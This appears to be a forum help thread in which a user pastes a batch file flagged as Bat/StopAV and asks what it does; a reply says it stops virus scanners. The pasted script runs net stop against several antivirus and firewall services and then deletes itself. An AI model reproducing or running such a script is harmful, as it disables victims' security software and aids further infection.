Answer» hi. can anyone HELP me? i scanned my computer and it said that in C:\\WINDOWS\stop.bat there was a virus named Bat/StopAV, which i could't find on any virus list. the text of the PROGRAM is as follows: net stop Mcshield net stop "Norton Antivirus SERVICE" net stop "Panda Antivirus" net stop "TrendMicro Infrastructure" net stop "ZoneAlarm" set fuckms="McAfee Framework Service" net stop "DETECTOR de OfficeScanNT" net stop %fuckms% del %windir%\system32\stop.bat /q i'm naive to that kind of language, so i don't understand what does it all means. i read somewhere that the program mya be deleted if it has no vital information, but is there anything that would enrisk my computer if i delete the FILE? what does the stop.bat file do? thanx for all your helpLooks to me like a batch file to stop any virus scanners running.
